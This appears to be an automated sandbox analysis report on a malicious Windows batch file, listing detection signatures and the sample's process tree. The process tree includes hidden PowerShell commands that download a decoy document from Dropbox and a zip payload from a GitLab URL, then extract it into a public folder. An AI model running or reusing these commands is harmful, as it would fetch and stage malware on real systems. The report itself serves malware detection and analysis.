Edit tour
Windows
Analysis Report
hnsadjhfg18De.bat
Overview
General Information
Detection
Abobus Obfuscator, Braodo
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 5864 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\hnsad jhfg18De.b at" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1680 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 1776 cmdline:
chcp.com 4 37 MD5: 33395C4732A49065EA72590B14B64F32) - find.exe (PID: 1972 cmdline:
fInd MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - find.exe (PID: 4400 cmdline:
find MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - findstr.exe (PID: 2876 cmdline:
findstr /L /I set "C :\Users\us er\Desktop \hnsadjhfg 18De.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 1224 cmdline:
findstr /L /I goto " C:\Users\u ser\Deskto p\hnsadjhf g18De.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 7064 cmdline:
findstr /L /I echo " C:\Users\u ser\Deskto p\hnsadjhf g18De.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 2820 cmdline:
findstr /L /I pause "C:\Users\ user\Deskt op\hnsadjh fg18De.bat " MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 1272 cmdline:
C:\Windows \system32\ cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 2752 cmdline:
C:\Windows \system32\ cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 2812 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //www.drop box.com/sc l/fi/mfmem sox3eb9769 rgrajn/Gar min_Campai gn_Informa tion_for_P artners_V1 1.docx?rlk ey=oy421vw zu8dsedagx t4w0ddsw&s t=31jc5byu &dl=1', 'C :\Users\us er\AppData \Local\Tem p\\Garmin_ Campaign_I nformation _for_Partn ers_V11.do cx')" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 5064 cmdline:
powershell -WindowSt yle Hidden -Command "Start-Pro cess 'C:\U sers\user\ AppData\Lo cal\Temp\\ Garmin_Cam paign_Info rmation_fo r_Partners _V11.docx' " MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 3524 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //gitlab.c om/fgh8090 051/jgh/-/ raw/main/F Ga1812.zip ', 'C:\Use rs\Public\ Document.z ip')" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 5012 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "Add-T ype -Assem blyName Sy stem.IO.Co mpression. FileSystem ; [System. IO.Compres sion.ZipFi le]::Extra ctToDirect ory('C:/Us ers/Public /Document. zip', 'C:/ Users/Publ ic/Documen t')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AbobusObfuscator | Yara detected Abobus Obfuscator | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Integrated Neural Analysis Model: |
Source: | File created: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |